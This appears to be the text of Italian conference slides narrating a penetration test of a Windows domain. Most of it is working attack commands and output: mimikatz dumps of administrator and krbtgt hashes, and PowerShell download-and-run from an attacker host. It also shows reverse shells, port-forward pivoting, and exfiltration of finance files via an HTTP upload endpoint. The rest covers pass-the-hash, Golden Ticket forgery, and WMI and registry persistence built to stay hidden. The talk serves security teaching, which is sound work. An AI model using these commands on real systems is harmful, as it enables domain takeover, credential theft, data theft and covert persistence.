.#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
.## ^ ##. "A La Vie, A L'Amour"
## / ## /* * *
## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 20 modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
...
[00000003] Primary
* Username : Administrator
* Domain : SRVINTRANET
* NTLM : 604603ab105adc8XXXXXXXXXXXXXXXXX
* SHA1 : 7754ff505598bf3XXXXXXXXXXXXXXXXXXXXXXXXX
...
25. Piano C: No admin logged-in? No problem!
➔ Con i privilegi di SYSTEM era facile reperire gli hash di local Administrator
Command: cmd /c powershell -nop -exec bypass -command "import-module
c:tomcatwebappscmdwarfilesmimigatto.ps1;
ChiamaIlGatto -command '"lsadump::lsa /name:administrator /inject"'"
.#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
.## ^ ##. "A La Vie, A L'Amour"
## / ## /* * *
## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 20 modules * * */
mimikatz(powershell) # lsadump::lsa /name:administrator /inject
Domain : SRV2012 / S-1-5-21-938204560-2839928776-2225904511
RID : 000001f4 (500)
User : administrator
* Primary
LM :
NTLM : 604603ab105adc8XXXXXXXXXXXXXXXXX
27. Lateral Reconnaissance: alla ricerca di internet
➔ Possibili bersagli: SRVWSUS e SRVAV
◆ Uno di loro doveva uscire su Internet
➔ E poi quel SRVFILE1 …
Command: cmd /c net view
Server Name Remark
-------------------------------------------------
SRVDC1 Domain controller PDC
SRVDC2 Domain Controller
SRVWSUS Server WSUS
SRVAV Server AV
SRVFILE1 File Server
...
28. Lateral Movement: SRVWSUS
➔ SRVWSUS accede ad Internet?
➔ Le hash catturate valgono su SRVWSUS?
➔ Pass-the-Hash con PS, si può?
◆ SMBExec.ps1
◆ WMIExec.ps1
https://github.com/Kevin-Robertson/Invoke-TheHash
33. SRVWSUS: Alla ricerca di nuove credenziali
➔ E chi era questo utente di dominio “adm.arazzi”?
PS C:tmp>iex (New-Object Net.WebClient).DownloadString('http://NOSTRO_IP/mimigatto.ps1');
ChiamaIlGatto -PrendiCroccantini
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 749566 (00000000:000b6ffe)
Session : Interactive from 2
User Name : adm.arazzi
Domain : SUPERCOMPANY
Logon Server : SRVDC1
Logon Time : 9/11/2016 10:23:28 AM
SID : S-1-5-21-3534665177-2148510708-2241433719-1001
msv :
[00000003] Primary
* Username : adm.arazzi
* Domain : SUPERCOMPANY
* NTLM : 446687c38d831f4XXXXXXXXXXXXXXXXX
* SHA1 : 5cd9d993a606586XXXXXXXXXXXXXXXXXXXXXXXXX
34. ➔ Un target interessante? Farà parte dei Domain Administrators?
➔ Come verificarlo?
➔ Pass-the-Hash con Mimikatz!
SRVWSUS: adm.arazzi
36. SRVWSUS: adm.arazzi
PS c:tmp>type whoisarazzi.txt
The request will be processed at a domain controller for domain supercompany.local.
User name adm.arazzi
Full Name antonio razzi
Comment :-)
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
(..)
Local Group Memberships *Administrators
Global Group memberships *Group Policy Creator *Domain Users
*Domain Admins *Schema Admins
*Enterprise Admins
37. Lateral Movement: SRVFILE1
➔ SRVWSUS diventa il pivot per accedere al FileServer:
➔ Su SRVWSUS download di una nuova reverse shell (attenzione all'IP!)
PS c:tmp>netsh interface portproxy add v4tov4 listenport=8888
listenaddress=0.0.0.0 connectport=443 connectaddress=NOSTRO_IP
PS c:tmp>IEX(New-Object
Net.WebClient).DownloadFile('http://NOSTRO_IP/r2.ps1','c:tmpr2.ps1')
$ cat r2.ps1
...
$client = New-Object
System.Net.Sockets.TCPClient('<SRVWSUS_IP>',8888)
..
38. Lateral Movement: SRVFILE1
➔ Download & Exec di HTTP.ps1, un mini server HTTP
PS c:tmp>type http.ps1
# http.ps1
start-job { # will execute in bg
$p="c:tmp"
$H=New-Object Net.HttpListener
$H.Prefixes.Add("http://+:8001/")
$H.Start()
...
PS c:tmp>IEX(New-Object
Net.WebClient).DownloadFile('http://NOSTRO_IP/http.ps1','c:tmphttp.ps1'); .http.ps1
Id Job ...
-- ---
6 Job6 ...
41. Lateral Movement: SRVFILE1
➔ Sulla nostra macchina: nc -lvp 443
➔ Su SRVWSUS:
PS C:tmp> .wmiexec.ps1
Command executed with process ID 4756 on SRVFILE1_IP
42. Lateral Movement: SRVFILE1
➔ Et voilà! # nc -lvp 443
connect to NOSTRO_IP from <COMPANY_PUBLIC_IP> 49190
PS C:Windowssystem32> whoami
supercompanyadm.arazzi
43. Checkpoint: situazione shell
➔ 2 reverse shell in PowerShell:
◆ Su SRVWSUS siamo SYSTEM
◆ Su SRVFILE1 via SRVWSUS siamo Domain Administrator!!
44. ➔ Grazie alla shell su SRVFILE1 i dati sensibili ci stavano aspettando:
➔ Come fare exfiltration?
➔ Tentativo #1: Exfiltration via FTP Fallito
Exfiltration
Directory: F:FinanzaRiservato
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 9/24/2016 2:20 AM 164468 Supersecret.docx
-a--- 5/29/2016 6:41 PM 12288 Bilancio.xlsx
…
45. Exfiltration
➔ Ricordate KISS? Upload via HTTP sul nostro server?
➔ Per il client? Upload.ps1
http://blog.majcica.com/2016/01/13/powershell-tips-and-tricks-multipartform-data-requests/
<?php
// index.php
$fname = @$_FILES['fname']['name'];
$fname_loc = @$_FILES['fname']['tmp_name'];
echo (@move_uploaded_file($fname_loc,$fname))?"DONE":"ERROR";
46. Exfiltration
➔ A questo punto occorreva un nuovo portforward su SRVWSUS
➔ Download upload.ps1 su SRVFILE1 via SRVWSUS
# [SRVFILE1 <-> SRVWSUS:8889 <-> ATTACKER:80]
interface portproxy add v4tov4 listenport=8889 listenaddress=0.0.0.0 connectport=80
connectaddress=NOSTRO_WEB_SERVER
PS C:tmp> (New-Object
Net.WebClient).DownloadFile('http://SRVWSUS:8889/upload.ps1','c:tmpupload.ps1')
52. Fear the Golden Ticket attack*
➔ Il “Golden Ticket” è un ticket Kerberos (TGT)
creato offline in modo tale da garantire
l’accesso fraudolento ad un dominio AD,
impersonando qualsiasi utente (anche il
Domain Admin), e valido anche per 10 anni!
➔ Funziona anche se la vittima cambia la sua
password
➔ Come è possibile?
◆ Il ticket e i dati autorizzativi sono firmati con gli hash
dell’account “krbtgt”
* by Benjamin DEPLY - mimikatz
53. Golden Ticket? DIY!
➔ PRE: nuovo portforwarding su SRVWSUS, smbexec.ps1, upload
mimigatto.ps1, etc... per ottenere shell come SYSTEM sul domain controller
➔ Export hash di krbtgt con mimikatz e preso il SID del dominio:
PS C:windowstemp>ChiamaIlGatto -command '"privilege::debug” "LSADump::LSA /name:krbtgt
/inject"' > hash.txt
PS C:windowstemp>type hash.txt
Domain : SUPERCOMPANY / S-1-5-21-3534665177-2148510708-2241433719
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 3003567af268a4a94e26f410e84353f1
...
aes256_hmac (4096) :
9bf24ba27d9ddf67e077cbab435e06e8006109bc572793868ea3864b465fd155
aes128_hmac (4096) : 46be43e81ca521d647f332bd4e1b7897
des_cbc_md5 (4096) : d5ade3405ea183ce
54. Golden Ticket? DIY!
➔ E poi ... comodamente offline!
mimikatz# kerberos::golden /admin:Administrator
/domain:supercompany.LOCAL
/sid:S-1-5-21-3534665177-2148510708-2241433719
/aes256:9bf24ba27d9ddf67e077cbab435e06e8006109bc572793868ea3864b465fd155
/ticket:admin.krb
55. ➔ Da SRVWSUS: shell Local SYSTEM
➔ Download admin.krb (ticket kerberos)
➔ Pass-The-Ticket!
Golden Ticket in action!
mimikatz(powershell) # kerberos::ptt admin.krb
* File: 'admin.krb': OK
PS C:tmp> klist
Current LogonId is 0:0x3e7
Cached Tickets: (1)
#0> Client: Administrator @ supercompany.LOCAL
Server: krbtgt/supercompany.LOCAL @ supercompany.LOCAL
56. Golden Ticket in action!
# nc -lvp 443
…
PS C:Windowssystem32> whoami
supercompanyadministrator
PS C:tmp> copy c:tmpr3.ps1 SRVDC1C$windowstempr3.ps1
PS C:tmp> wmic /authority:"kerberos:SUPERCOMPANYSRVDC1"
/node:SRVDC1 process call create "powershell -exec bypass
-windowstyle hidden -f c:windowstempr3.ps1"
Executing (Win32_Process)->Create()
Method execution successful.
...
Long time persistence
58. Persistenza
➔ Windows Management Instrumentation (WMI), un posto meno “scontato” dove
aggiungere persistenza, sfruttando l’evento InstanceModificationEvent
PS> $filterName = "JustForTestFilter"
PS> $consumerName = "JustForTestConsumer"
PS> $exePath = "C:windowshelpwindowsindexstorer.bat"
PS> $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND
TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 300"
PS> $WMIEventFilter=Set-WmiInstance -Class __EventFilter
-NameSpace "rootsubscription"
-Arguments
@{Name=$filterName;EventNameSpace="rootcimv2";QueryLanguage="WQL";
Query=$Query} -ErrorAction Stop
PS> $WMIEventConsumer=Set-WmiInstance -Class CommandLineEventConsumer
-Namespace "rootsubscription" -Arguments
@{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exepath
}
PS> Set-WmiInstance -Class __FilterToConsumerBinding -Namespace
"rootsubscription"
-Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
59. Persistenza
➔ E la PS shell? Cosa fare nel caso di una caduta?
➔ No problem, ci si rialza!
PS C:windowshelpwindowsindexstore>type r.bat
@echo off
:loop
powershell -nop -executionpolicy bypass -windowstyle
hidden -f C:windowshelpwindowsindexstorer.ps1
timeout /t 30
goto loop
60. Persistenza
➔ Bonus trick: “autoruns” non se ne accorge!
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
"Stealth"="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL "C:windowshelpwindowsindexstorer.bat""
https://gist.githubusercontent.com/hasherezade/e3b5682fee27500c5dabf5343f447de3
63. Grazie ai revisori dell’articolo originale ...
.. a Mario e tutto lo staff di HackInBo
Un saluto agli amici dello
“Snado Team”!!
PS>.installSNADO.ps1 -permanent
Andrea <decoder.ap@gmail.com>, <@decoder_it>
Giuseppe <giutrotta@gmail.com>, <@giutro>